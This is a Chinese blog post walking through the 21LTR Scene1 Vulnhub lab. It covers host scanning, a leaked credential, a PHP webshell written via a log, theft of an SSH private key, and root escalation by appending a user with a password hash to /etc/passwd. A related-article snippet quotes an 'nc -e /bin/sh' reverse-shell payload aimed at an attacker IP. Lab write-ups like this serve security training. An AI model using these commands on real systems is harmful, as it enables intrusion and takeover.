21LTR.com_Scene1

最新推荐文章于 2024-11-09 23:34:47 发布
最新推荐文章于 2024-11-09 23:34:47 发布
阅读量207 收藏 1
点赞数 10
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140808981
版权

一、信息收集

1、主机发现

nmap 192.168.2.0/24

2、端口扫描

nmap 192.168.2.120 -p-

3、目录扫描

dirsearch -u http://192.168.2.120

二、GetShell

步骤一:访问ip地址

步骤二:f12 查看网页源码,发现一个账号密码:logs/zg]E-b0]+8:(58G,尝试ssh连接,连接失败

步骤三:尝试ftp连接,连接成功

步骤四:发现backup_log.php文件,下载到本地查看,发现是日志文件,可能存在于logs目录下

get backup_log.php /home/kali/Desktop/backup.php

步骤五:在php文件中写入一句话木马,需要利用10001端口,查看日志文件

步骤六:蚁剑连接,查看/etc/passwd文件

步骤七:读取密钥 /media/USB_1/Stuff/Keys/id_rsa ,保存到本地,finalshell连接

三、提权

步骤一:sudo -l,发现可以用cat命令进行提权

步骤二:使用kali生成密码,写入一个高权限用户到/etc/passwd文件中,切换用户,成功提权

echo 'newroot:$1$C3IiTm6F$s.v.18n3OoZ66KELuBa2D1:0:0:/root:/bin/bash' >> /etc/passwd

花椒椒椒
关注
专栏目录
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 748
  练习环境     攻击机:kali     靶机:21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
21 LTR- Scene1 靶机-打靶详细流程
10-08
21 LTR- Scene1 靶机-打靶详细流程
21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
zdd1453691081的博客
07-30 410
【代码】21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
21LTR.com_Scene1_2.120靶机
2401_84564260的博客
07-30 688
创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。su切换newuser用户。查看靶机的mac地址。
21LTR.com_Scene1_2.120_v1.0靶机
weixin_71232352的博客
07-30 223
1.查看mac地址并将kali添加一个仅主机模式并使用dhcp分配一个192.168.2.0网段网卡,将靶机设置成仅主机模式。13.kali监听并把网址后边id换成nc%20-e%20/bin/sh%20192.168.2.129%20443。11.在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell。6.发现登录凭证,尝试ssh连接发现失败,尝试ftp连接连接成功。查看/etc/passwd文件验证,发现确实存在hbeale用户。7.ls 发现有一个.php文件。
21LTR.com_Scene1_2.120_v1.0靶机复现
weixin_52956666的博客
07-31 308
查看/media/USB_1/Stuff/Keys下的id_rsa文件。将kali和虚拟机都设置为仅主机模式,网段都为192.168.2。使用telnet 192.168.2.120 10001连接。cd到ssh文件下,进行config文件编辑。ls查看有backup_log.php文件。ftp 192.168.2.120连接。密码:zg]E-b0]+8:(58G。输入账号密码发现连接失败。查看源码发现有账号密码。查看内容暂无有价值内容。读取etc/shdow。将文件保存到kali。发现root用户密码。
21LTR: Scene 1靶机
m0_61995767的博客
07-30 630
21LTR: Scene 1打靶记录
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 420
21LTR:Scene1靶机,打靶文章
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 451
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
21 LTR: Scene1 靶机-详细流程
m0_73983897的博客
09-15 1208
通过网页源码获取可用账号密码,也算是靶机的一种常见套路了,但是这个一般挺难注意到,以后在遇到瓶颈时,可以尝试通过查看网页源代码获取可用信息;FTP文件读取+获取shell 比较少见,但也提醒了我 发现可疑文件 + 目录扫描 ,这2者是紧密关联的;关于靶机给出的端口信息,一般情况下靶机是不会开无用的服务的,给出的端口信息,既是提示,也是突破口;FTP文件的读取和下载也是需要多做尝试的点,多换环境和方式,总会有可用的;发现开放 21,22,80端口,测试访问80端口。下载到本机(下载到kali也可以不影响)
r58_bmi160_bma250_ov2640_dev点亮VGA的ov2640HDMI显示_20160630_1142.7z
06-30
used_scene_mode = 1 key_support_scene_mode = auto,hdr key_default_scene_mode = auto used_white_balance = 1 key_support_white_balance = auto,incandescent,fluorescent,warm-fluorescent,daylight,cloudy-...
p720_ov2640_r58_dev拍照和录像都是720p的分辨率20160713_1430.7z
07-13
used_scene_mode = 1 key_support_scene_mode = auto,hdr key_default_scene_mode = auto used_white_balance = 1 key_support_white_balance = auto,incandescent,fluorescent,warm-fluorescent,daylight,cloudy-...
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
weixin_46641057的博客
11-09 888
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
PHP常用的安全函数作用
sheji888的专栏
11-06 507
这些函数和方法有助于提升PHP应用的安全性,但安全是一个综合性的问题,需要综合使用多种手段,如输入验证、输出编码、会话管理、错误处理等。在PHP开发中,安全是非常重要的一个方面。
【销帮帮-注册_登录安全分析报告-试用页面存在安全隐患】
weixin_46641057的博客
11-09 542
杭州逍邦网络科技有限公司成立于2015年,是国内一线CRM品牌和企服领域知名品牌。致力为客户提供专业的客户全生命周期管理和数字化销售管理服务,助力企业提升业绩,让企业更成功。销帮帮拥有强大而灵活的“PaaS+低代码”能力。在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
【AliCloud】ack + ack-secret-manager + kms 敏感数据安全存储
最新发布
StrayCat的博客
11-09 691
ack-secret-manager支持以Kubernetes Secret实例的形式向集群导入或同步KMS凭据信息,确保您集群内的应用能够安全地访问敏感信息。通过该组件,您可以实现密钥数据的自动更新,使应用负载通过文件系统挂载指定Secret实例来使用凭据信息,同时帮助您解决负载应用和阿里云凭据管家交互的兼容性问题。
5. Redis的 安全与性能优化
一名全栈开发工程师
11-06 814
Redis引入了“沙盒机制”,即在脚本执行过程中,脚本被限制只能访问Redis的某些命令和数据集。
安全关机和重启NDB集群
cncdns的专栏
11-09 276
在生产环境中,完全关闭集群通常是不可取的。在许多情况下,即使在进行配置更改或对集群硬件或软件(或两者兼而有之)进行升级时,这需要关闭单个主机,也可以通过执行滚动重新启动集群来关闭整个集群。
数字身份发展趋势前瞻:身份韧性与安全
trusfort的博客
11-05 537
面对日益复杂的网络威胁和不断增长的身份盗窃风险,身份韧性与安全不仅仅涉及产品的防御能力,还包括应对突发事件、快速恢复的弹性和灵活性。
Ltr_retriever安装
07-14
git clone https://github.com/codertimo/LTR-retriever.git ``` 3. 进入 Ltr_retriever 目录: ``` cd LTR-retriever ``` 4. 安装依赖项。您可以使用 pip 来安装所需的 Python 包: ``` pip install -r ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值